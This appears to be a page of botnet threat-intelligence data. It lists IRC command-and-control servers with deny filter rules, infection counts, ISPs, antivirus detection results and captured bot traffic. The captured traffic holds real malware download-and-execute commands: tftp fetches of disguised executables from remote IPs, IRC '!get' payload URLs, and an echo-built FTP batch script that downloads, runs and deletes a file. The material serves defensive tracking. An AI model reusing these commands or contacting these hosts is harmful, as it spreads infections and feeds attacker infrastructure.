KasperskyVanBot.ax
McAfeeMISSED
MicrosoftExploit_MS06040.gen
NOD32v2MISSED
NormanHupigon.gen83
PandaRXBot.AB.worm
Prevx1MISSED
RisingIRCbot.fbi
SophosMISSED
SunbeltAgent.YRG
SymantecIRCbot
TheHackerBackdoorVanBot.ax
TrendMicroMISSED
VBA32VanBot.ax
VirusBusterRBot.ONM
Webwasher
Gateway
VanBot.AX.116
Priority 8 TCP Ports 3305 Filter deny ip host 212.54.2.171 any log ! 8 infects 10/30/09 to 12/28/09 megabaud.fi ISP elisa oyj
Clients 8 finland Activity Domain megabaud.fi
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 202.157.56.125 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 202.157.56.125 get dllhost.exe wins\\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|nold11864USER zspnyxd3k * 0 :USA|2K|633
  • Server: :hub.35869.net 001 P|nold11864...
  • Client: USERHOST P|nold11864
  • Server: :hub.35869.net 302 P|nold11864...
  • Client: USERHOST P|nold11864MODE P|nold11864 JOIN #mm RSA
  • Client: PRIVMSG #mm...

more....

BotClient Antivirus Diagnoses
AhnLab-V3IRCBot.variant
AntiVirTRDropper.Gen
AuthentiumThreat-HLLIYE!Eldorado
Avast_DCom-F
AVGHeur
BitDefenderPacker.Yoda.A
CAT-QuickHealIRCBot.idc
ClamAVMISSED
DrWebHLLW.Piabot
eSafeTRDropper
eTrust-VetIRCBot.KU
EwidoMISSED
FileAdvisorMISSED
FortinetPossibleThreat
F-ProtThreat-HLLIYE!Eldorado
F-SecureIRCBot.idc
IkarusExploit.MS06040
KasperskyIRCBot.idc
McAfeeMISSED
MicrosoftExploit_MS06040.gen
NOD32v2MISSED
NormanSmalltroj.MTNE
PandaGaobot.OXI.worm
Prevx1MISSED
RisingMS06-040.b
SophosMalPacker
SunbeltWootbot.gen
SymantecSpybot.Worm
TheHackerBackdoorIRCBot.idc
TrendMicroTROJ_LSADCOM.MCL
VBA32Kolabc.gco
VirusBusterIRCBot.AAWX
Webwasher
Gateway
MISSED
Priority 8 TCP Ports 65520 65520 88 Filter deny ip host 122.195.190.197 any log ! 8 infects 12/30/09 to 01/07/10 canadian-solar.com ISP china unicom jiangsu province network
Clients 8 china Activity Domain canadian-solar.com
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 70.184.248.143 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 70.184.248.143 get dllhost.exe wins\\DLLHOST.EXE
  • Client: NICK ynqsvhnjUSER r020500 . . :-
  • Client: Service Pack 2JOIN &virtu
  • Server: :u. PRIVMSG ynqsvhnj :!get http:/www.liagand.cn/img/unpr.gif:u...
  • Client: GET /img/unpr.gif HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /erdown.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /pk/pw1022.exe HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /p0905/2.0/d.bin?js02679582 HTTP/1.0Accept: */*User-Agent:...
  • Server: GET /portal.php HTTP/1.0Accept: image/gif, image/x-xbitmap,...
  • Server: GET /portal.php HTTP/1.0Accept: image/gif, image/x-xbitmap,...
  • Server: GET /p1022/2.0/ms.bin?js0241037 HTTP/1.0Accept: */*User-Agent:...
  • Server: PONG :i.
  • Client: JOIN &virtu
  • Server: PONG :i.
  • Client: JOIN &virtu
  • Server: PONG :i.
  • Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureMISSED
IkarusMISSED
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 8 TCP Ports 65520 91 Filter deny ip host 91.212.220.156 any log ! 8 infects 08/23/09 to 09/07/09 - ISP group vertical ltd
Clients 8 russian federation Activity Domain -
Chatter Example
  • Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host:...
  • Client: NICK dtugkmbeUSER i020501 . . :-
  • Client: JOIN &virtu
  • Server: :k. PRIVMSG dtugkmbe :!get http:/gidromash.cn/oc/box.txt
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: NICK jddwnomeUSER n020501 . . :-
  • Client: JOIN &virtu
  • Server: :l. PRIVMSG jddwnome :!get http:/gidromash.cn/oc/box.txt
  • Server: PONG :l.
  • Client: JOIN &virtu
  • Server: PONG :l.
  • Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses
AhnLab-V3Virut.B
AntiVirVirut.AX
AuthentiumKorgo.V
Avast_Virtob
AVGKorgo.A
BitDefenderPadobot.BV.Dam
CAT-QuickHealVirut.Z
ClamAVVirut-54
DrWebLsabot
eSafeMISSED
eTrust-VetVirut.7115
EwidoMISSED
FileAdvisorMISSED
FortinetVirut.AV
F-ProtKorgo.V
F-SecureMISSED
IkarusPadobot.M
KasperskyPadobot.m
McAfeeVirut.gen.a
MicrosoftKorgo.V
NOD32v2MISSED
NormanKorgo.V
PandaVirutas.FG
Prevx1MISSED
RisingVirut.an
SophosVirut-W
SunbeltMISSED
SymantecVirut.W
TheHackerVirut.av
TrendMicroPE_VIRUT.AV
VBA32Virut.2
VirusBusterPadobot.D
Webwasher
Gateway
MISSED
Priority 7 TCP Ports 65520 Filter deny ip host 221.5.74.39 any log ! 7 infects 08/13/09 to 08/17/09 cncnet.net ISP china unicom guangdong province network
Clients 7 china Activity Domain cncnet.net
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 222.234.215.213 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 222.234.215.213 get dllhost.exe wins\\DLLHOST.EXE
  • Client: NICK jdhsdjqxUSER p020501 . . :-
  • Client: JOIN &virtu
  • Server: :j. PRIVMSG jdhsdjqx :!get http:/dretis.cn/oc/box.txt
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses
AhnLab-V3Virut.D
AntiVirVirut.Gen
AuthentiumVirut.9264
Avast_Virut
AVGVirut
BitDefenderVirtob.3.Gen
CAT-QuickHealVirut.D
ClamAVVirut.ca
DrWebVirut.5
eSafeMISSED
eTrust-VetVirut.9276
EwidoMISSED
FileAdvisorMISSED
FortinetMetaCrypt.5
F-ProtVirut.9264
F-SecureVirut.n
IkarusVirut.d
KasperskyVirut.n
McAfeeVirut.gen
MicrosoftVirut.AK
NOD32v2Virut.E
NormanVirut.D
PandaVirutas.gen
Prevx1MISSED
RisingVirut.GEN
SophosVirut-L
SunbeltMISSED
SymantecMISSED
TheHackerVirut.gen
TrendMicroPE_VIRUT.D-2
VBA32Virut.3
VirusBusterVirut.Gen
Webwasher
Gateway
Virut.Gen
Priority 7 TCP Ports 3305 Filter deny ip host 211.233.45.253 any log ! 7 infects 09/01/09 to 09/08/09 kidc.net ISP korea internet data center inc
Clients 7 korea_ republic of Activity Domain kidc.net
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 96.8.226.33 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 96.8.226.33 get dllhost.exe wins\\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|tyz4nprpcUSER v7sfuv623 * 0 :USA|XP|126
  • Server: :hub.49523.net 001 P|tyz4nprpc...
  • Client: USERHOST P|tyz4nprpc
  • Server: :hub.49523.net 302 P|tyz4nprpc...
  • Client: USERHOST P|tyz4nprpcMODE P|tyz4nprpc JOIN #mm RSA

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirTRDropper.Gen
AuthentiumThreat-HLLIYE!Eldorado
Avast_DCom-F
AVGHeur
BitDefenderPacker.Yoda.A
CAT-QuickHealMISSED
ClamAVMISSED
DrWebHLLW.Piabot.4
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtThreat-HLLIYE!Eldorado
F-SecureMISSED
IkarusExploit.MS06040
KasperskyHeur.Generic
McAfeeMISSED
MicrosoftExploit_MS06040.gen
NOD32v2MISSED
NormanMISSED
PandaTrjCI.A
Prevx1MISSED
RisingMISSED
SophosMalPacker
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroPAK_Generic.001
VBA32MISSED
VirusBusterPackedYoda
Webwasher
Gateway
MISSED
Priority 7 TCP Ports 65520 Filter deny ip host 83.133.119.206 any log ! 7 infects 02/06/10 to 02/08/10 greatnet.de ISP lncde-greatnet-newmedia
Clients 7 germany Activity Domain greatnet.de
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 116.126.215.24 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 116.126.215.24 get dllhost.exe wins\\DLLHOST.EXE
  • Client: NICK lcntiouuUSER c020501 . . :_
  • Client: JOIN &virtu
  • Server: :u. PRIVMSG lcntiouu :!get...
  • Client: GET /build/setup10.exe HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /op/lgate.php?n=94AEEEDFFCB64848 HTTP/1.0Accept:...
  • Server: GET /bt4/fout.php HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Server: PONG :j.
  • Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebSiggen.49592
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureMISSED
IkarusCryptor
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecSuspicious.Insight
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 6 TCP Ports 3305 Filter deny ip host 61.120.62.28 any log ! 6 infects 08/13/09 to 08/22/09 dion.ne.jp ISP rabby_s inc
Clients 6 japan Activity Domain dion.ne.jp
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 173.22.150.5 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 173.22.150.5 get dllhost.exe wins\\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|zr9eaoxa1USER dejgzufxb * 0 :USA|XP|577
  • Server: :hub.10842.net 001 P|zr9eaoxa1...
  • Client: USERHOST P|zr9eaoxa1
  • Server: :hub.10842.net 302 P|zr9eaoxa1...
  • Client: USERHOST P|zr9eaoxa1MODE P|zr9eaoxa1 JOIN #mm RSA

more....

BotClient Antivirus Diagnoses
AhnLab-V3IRCBot.Gen
AntiVirTRATRAPS.Gen
AuthentiumMISSED
Avast_DCom-F
AVGSHeur2.AOLW
BitDefenderGeneric.Mydoom.F72197F1
CAT-QuickHealAgent.gen
ClamAVMISSED
DrWebHLLW.Piabot.origin
eSafeMISSED
eTrust-VetIRCBot.PJ
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureKolabc.gza
IkarusExploit.MS06040
KasperskyKolabc.gza
McAfeeSpybot.worm!l
MicrosoftExploit_MS06040.gen
NOD32v2MISSED
NormanAtraps.MQB
PandaTrjCI.A
Prevx1MISSED
RisingMISSED
SophosMalBehav-004
SunbeltMISSED
SymantecSpybot.Worm
TheHackerMISSED
TrendMicroSPYBOT.BIM
VBA32MISSED
VirusBusterRBot.Gen.3
Webwasher
Gateway
MISSED
Priority 6 TCP Ports 80 Filter deny ip host 82.98.86.170 any log ! 6 infects 08/22/09 to 11/08/09 fhe3rz.net ISP sedo domain parking
Clients 6 germany Activity Domain fhe3rz.net
Chatter Example
  • Client: GET /xxxxxxx HTTP/1.0User-Agent: bHost: 203.180.17.238
  • Client: POST /w.php?ifc=0 HTTP/1.0Accept: image/gif, image/x-xbitmap,...
  • Server: GET...
  • Server: GET /css/724/landing/en.css HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/body_bg.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/td_bg.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/container_bg.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/keywords_bg.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/bullet.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/pop_cat_top.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/searchtext_bg.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/search.jpg HTTP/1.0Accept: */*Referer:...
  • Server: GET /images/724/footer_bg.jpg HTTP/1.0Accept: */*Referer:...
  • Client: POST /w.php?ifc=0 HTTP/1.0Accept: image/gif, image/x-xbitmap,...
  • Client: POST /w.php?ifc=0 HTTP/1.0Accept: image/gif, image/x-xbitmap,...

more....

BotClient Antivirus Diagnoses
AhnLab-V3Korgo.46592
AntiVirPadobot.Z.2
AuthentiumBerbew.M
Avast_Padobot-I
AVGGeneric7.ORM
BitDefenderGeneric.208542
CAT-QuickHealI-Padobot.z
ClamAVKorgo.Z
DrWebHangUp.26
eSafeMISSED
eTrust-VetBerkor.A
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtBerbew.M
F-SecurePadobot.z
IkarusPadobot.Z
KasperskyPadobot.z
McAfeeMISSED
MicrosoftBerbew.BE!dam
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingBerbew.d
SophosDoxpar-C
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroBKDR_BERBEW.Q
VBA32Padobot.z
VirusBusterPadobot.B
Webwasher
Gateway
MISSED
Priority 5 TCP Ports 8080 72 Filter deny ip host 67.43.236.66 any log ! 5 infects 08/13/09 to 10/02/09 - ISP nader dara
Clients 5 lebanon Activity Domain -
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 24.103.196.250 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 24.103.196.250 get dllhost.exe wins\\DLLHOST.EXE
  • Client: USER iqelkq iqelkq iqelkq :rjrximinlwihoahg
  • Client: NICK RODhbJxT
  • Client: MODE RODhbJxT +xi
  • Client: JOIN #las6 USERHOST RODhbJxTMODE #m +smntuPRIVMSG #m...
  • Client: GET /rs3.exe HTTP/1.0Host: nadsamcabran12.com
  • Client: MODE #las6 +smntu
  • Server: :hub.20582.com 482 RODhbJxT #las6 :You\\'re not channel operator
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: PING :hub.20582.com
  • Server: :eh!Y@hoo.net PRIVMSG #las6 :* ipscan s.s.s.s dcom2 -sERROR...

more....

BotClient Antivirus Diagnoses
AhnLab-V3Virut
AntiVirVirut.AT
AuthentiumVirut.AG
Avast_Virtob
AVGRBot.KB
BitDefenderIRC-Generic.3619
CAT-QuickHealVirut.Y
ClamAVSmall-4287
DrWebIRC.Sdbot.2665
eSafeTRCrypt.nspm
eTrust-VetVirut.6640
EwidoMISSED
FileAdvisorMISSED
FortinetNepoe.EM!tr.bdr
F-ProtVirut.AG
F-SecureNepoe.em
IkarusMISSED
KasperskyNepoe.em
McAfeeVirut.gen.a
MicrosoftVirut.AA
NOD32v2MISSED
NormanVirut.AH
PandaVirutas.AH
Prevx1MISSED
RisingVirut.al
SophosVirut-Gen
SunbeltMISSED
SymantecVirut.W
TheHackerVirut.genS
TrendMicroPE_VIRUT.AT
VBA32Nepoe.em
VirusBusterPoeBot.OB
Webwasher
Gateway
MISSED
Priority 5 TCP Ports 8080 8080 67 Filter deny ip host 72.10.172.211 any log ! 5 infects 08/17/09 to 10/16/09 gtcomm.net ISP globotech communications
Clients 5 canada Activity Domain gtcomm.net
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 24.103.196.250 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 24.103.196.250 get dllhost.exe wins\\DLLHOST.EXE
  • Client: USER jseabq jseabq jseabq :dqhawgsvzjhxsrsm
  • Client: NICK ErEDHMyl
  • Client: MODE ErEDHMyl +xi
  • Client: GET /rs3.exe HTTP/1.0Host: idfc.info
  • Server: GET /f.exe HTTP/1.0Host: idfc.info
  • Client: JOIN #las6 USERHOST ErEDHMylMODE #m +smntuPRIVMSG #m...
  • Client: MODE #las6 +smntu
  • Server: :hub.20582.com 482 ErEDHMyl #las6 :You\\'re not channel operator

more....

BotClient Antivirus Diagnoses
AhnLab-V3Virut
AntiVirVirut.AT
AuthentiumVirut.AG
Avast_Virtob
AVGRBot.KB
BitDefenderIRC-Generic.3619
CAT-QuickHealVirut.Y
ClamAVSmall-4287
DrWebIRC.Sdbot.2665
eSafeTRCrypt.nspm
eTrust-VetVirut.6640
EwidoMISSED
FileAdvisorMISSED
FortinetNepoe.EM!tr.bdr
F-ProtVirut.AG
F-SecureNepoe.em
IkarusMISSED
KasperskyNepoe.em
McAfeeVirut.gen.a
MicrosoftVirut.AA
NOD32v2MISSED
NormanVirut.AH
PandaVirutas.AH
Prevx1MISSED
RisingVirut.al
SophosVirut-Gen
SunbeltMISSED
SymantecVirut.W
TheHackerVirut.genS
TrendMicroPE_VIRUT.AT
VBA32Nepoe.em
VirusBusterPoeBot.OB
Webwasher
Gateway
MISSED
Priority 5 TCP Ports 65520 65520 216 Filter deny ip host 218.93.205.24 any log ! 5 infects 08/13/09 to 08/14/09 163data.com.cn ISP chinanet jiangsu province network
Clients 5 china Activity Domain 163data.com.cn
Chatter Example
  • Server: PONG :j.
  • Client: JOIN &virtu
  • Client: POST...
  • Server: NICK ibeffknfUSER v020500 . . :_
  • Client: Service Pack 2JOIN &virtu
  • Server: PONG :i.
  • Client: JOIN &virtu
  • Server: PONG :i.
  • Client: JOIN &virtu
  • Server: PONG :i.
  • Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureMISSED
IkarusMISSED
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 4 TCP Ports 65520 65520 216 Filter deny ip host 218.93.205.23 any log ! 4 infects 08/19/09 to 08/20/09 163data.com.cn ISP chinanet jiangsu province network
Clients 4 china Activity Domain 163data.com.cn
Chatter Example
  • Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 85.132.5.169:1737
  • Client: NICK hxpxonzsUSER c020501 . . :-
  • Client: JOIN &virtu
  • Server: :i. PRIVMSG hxpxonzs :!get http:/dretis.cn/oc/box.txt

more....

BotClient Antivirus Diagnoses
AhnLab-V3Virut.B
AntiVirVirut.AX
AuthentiumKorgo.W
Avast_Virtob
AVGKorgo.D
BitDefenderGeneric.1674959
CAT-QuickHealVirut.Z
ClamAVMISSED
DrWebLsabot
eSafeVirut.n
eTrust-VetVirut.7115
EwidoMISSED
FileAdvisorMISSED
FortinetVirut.AV
F-ProtKorgo.W
F-SecureVirut.av
IkarusKorgo.K
KasperskyVirut.av
McAfeeVirut.gen.a
MicrosoftKorgo.AB
NOD32v2MISSED
NormanKorgo.Y
PandaVirutas.FG
Prevx1MISSED
RisingJunk.Virut.a
SophosVirut-W
SunbeltGeneric!BT
SymantecVirut.W
TheHackerVirut.av
TrendMicroPE_VIRUT.AV
VBA32Virut.2
VirusBusterKorgo.AB
Webwasher
Gateway
MISSED
Priority 4 TCP Ports 6900 Filter deny ip host 81.12.88.44 any log ! 4 infects 11/20/09 to 11/20/09 - ISP farhang arya communications company
Clients 4 iran_ islamic republic of Activity Domain -
Chatter Example
  • Client: NICK Bisho911USER htiwa 0 0 :Bisho911
  • Server: :fart.bitchassness.shit NOTICE Bisho911 :*** If you are having...
  • Server: PONG :940FFB4F
  • Client: JOIN ##!X4
  • Client: USERHOST Bisho911MODE Bisho911 -x+iJOIN ##!X4 USERHOST...
  • Server: :fart.bitchassness.shit NOTICE Bisho911 :Setting/removing of...
  • Server: PONG :fart.bitchassness.shit

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureMISSED
IkarusMISSED
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 3 TCP Ports 6668 6667 Filter deny ip host 91.121.83.177 any log ! 3 infects 08/22/09 to 08/22/09 gergosnet.com ISP ovh sas
Clients 3 france Activity Domain gergosnet.com
Chatter Example
  • Client: USER 1
  • Server: 331 Password required
  • Client: PASS 1
  • Server: 230 User logged in.
  • Server: RETR mode.exe
  • Server: 150 Opening BINARY mode data connection
  • Server: 221 Goodbye happy r00ting.
  • Client: NICK gyreobciUSER cwbkcdugs 0 0 :gyreobci
  • Server: :irc.priv8net.com NOTICE AUTH :*** Looking up your...
  • Client: USERHOST gyreobci
  • Client: MODE gyreobci +xiJOIN ##Stab## qifort1USERHOST gyreobciMODE...
  • Server: PONG :irc.priv8net.com
  • Client: JOIN ##Stab## qifort1
  • Server: PONG :irc.priv8net.com
  • Client: JOIN ##Stab## qifort1
  • Server: PONG :irc.priv8net.com
  • Client: JOIN ##Stab## qifort1

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureSuspicious_Malware!Gemini
IkarusMISSED
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 3 TCP Ports 5190 67 Filter deny ip host 83.68.16.6 any log ! 3 infects 08/23/09 to 09/19/09 xs4all.nl ISP xs4all internet bv
Clients 3 netherlands Activity Domain xs4all.nl
Chatter Example
  • Client: USER qifonx qifonx qifonx :imeqgcebisvovxly
  • Client: NICK znbXghHO
  • Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...
  • Client: MODE znbXghHO +xi
  • Client: JOIN #las6 USERHOST znbXghHO
  • Server: :znbXghHO!qifonx@192.168.1.192 JOIN :#las6
  • Client: MODE #las6 +smntu
  • Server: :norks.org MODE #las6 +nt:norks.org 353 znbXghHO = #las6 :@wloos...
  • Client: USER qifonx qifonx qifonx :imeqgcebisvovxly
  • Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...
  • Server: NICK znbXghHO
  • Client: USER qifonx qifonx qifonx :imeqgcebisvovxlyNICK znbXghHO
  • Client: MODE znbXghHO +xi
  • Client: JOIN #las6 USERHOST znbXghHO
  • Server: :znbXghHO!qifonx@192.168.1.192 JOIN :#las6
  • Client: MODE #las6 +smntu
  • Server: :norks.org MODE #las6 +nt:norks.org 353 znbXghHO = #las6 :@wloos...

more....

BotClient Antivirus Diagnoses
AhnLab-V3Win-Nepoe.58880
AntiVirTRCrypt.XPACK.Gen
AuthentiumNepoe.A
AvastMISSED
AVGSHeur2.AIJS
BitDefenderIRC-Generic.5049
CAT-QuickHealNepoe.hm
ClamAVMISSED
DrWebPacked.162
eSafeTRCrypt.XPACK
eTrust-VetLinkbot.VJ
EwidoMISSED
FileAdvisorMISSED
FortinetNepoe.YW!tr
F-ProtNepoe.A
F-SecureNepoe.hm
IkarusPacker.Krunchy.B
KasperskyNepoe.hm
McAfeeMISSED
MicrosoftPoebot
NOD32v2MISSED
NormanSmalltroj.dam
PandaBckNepoe.F
Prevx1MISSED
RisingUndef.dnb
SophosMalGeneric-A
SunbeltMISSED
SymantecIRCBot
TheHackerMISSED
TrendMicroBKDR_NEPOE.CW
VBA32Nepoe.hm
VirusBusterNepoe.DL
Webwasher
Gateway
MISSED
Priority 2 TCP Ports 65520 216 Filter deny ip host 221.5.74.40 any log ! 2 infects 08/18/09 to 08/18/09 cncnet.net ISP china unicom guangdong province network
Clients 2 china Activity Domain cncnet.net
Chatter Example
  • Client: NICK tztznbvfUSER f020501 . . :-
  • Server: NICK tztznbvfUSER f020501 . . :-JOIN &virtu
  • Server: :j. PRIVMSG tztznbvf :!get http:/dretis.cn/oc/box.txt
  • Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /op/lgate.php?n=94AEEEDFFCB64848 HTTP/1.0Accept:...
  • Server: GET /bt5/fout.php HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /lib/bot.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /lib/abb.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /ag/lo.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET /dll/mal.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: GET...

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureSuspicious_Malware!Gemini
IkarusTrojan-Downloader.Obitel
KasperskyMISSED
McAfeeMISSED
MicrosoftTrojanDownloader_Obitel.gen!C
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 2 TCP Ports 13001 12351 Filter deny ip host 122.160.232.194 any log ! 2 infects 09/13/09 to 10/30/09 122.airtelbroadband.in ISP abts-dsl-del
Clients 2 india Activity Domain 122.airtelbroadband.in
Chatter Example
  • Client: echo open 85.179.166.148 17323>.pif C:\\WINDOWS\\system32>
  • Client: echo user a a>>.pif C:\\WINDOWS\\system32>
  • Client: echo binary>>.pif C:\\WINDOWS\\system32>
  • Client: echo GET iexplorer.exe>>.pif C:\\WINDOWS\\system32>
  • Client: echo bye>>.pif C:\\WINDOWS\\system32>
  • Client: echo @echo off >c.batC:\\WINDOWS\\system32>
  • Client: echo ftp -n -v -s:.pif >>c.batC:\\WINDOWS\\system32>
  • Client: echo iexplorer.exe >>c.batC:\\WINDOWS\\system32>
  • Client: echo del .pif >>c.batC:\\WINDOWS\\system32>
  • Client: echo del /F c.bat >>c.batC:\\WINDOWS\\system32>
  • Client: echo exit /y >>c.batC:\\WINDOWS\\system32>
  • Client: USER a
  • Client: PASS a
  • Server: RETR iexplorer.exe
  • Client: NICK `tkhjqhirUSER `tkhjqhir 0 0 :`tkhjqhir
  • Server: :irc.priv8net.com NOTICE AUTH :*** Looking up your hostname...
  • Client: JOIN #.has hs
  • Client: USERHOST `tkhjqhirJOIN #.has hsUSERHOST `tkhjqhirJOIN #.has...
  • Server: :`tkhjqhir!~tkhjqhir@183C7886.415835BD.ED5D58B5.IP JOIN...
  • Server: PONG :irc.priv8net.com
  • Client: JOIN #.has hs
  • Server: PONG :irc.priv8net.com
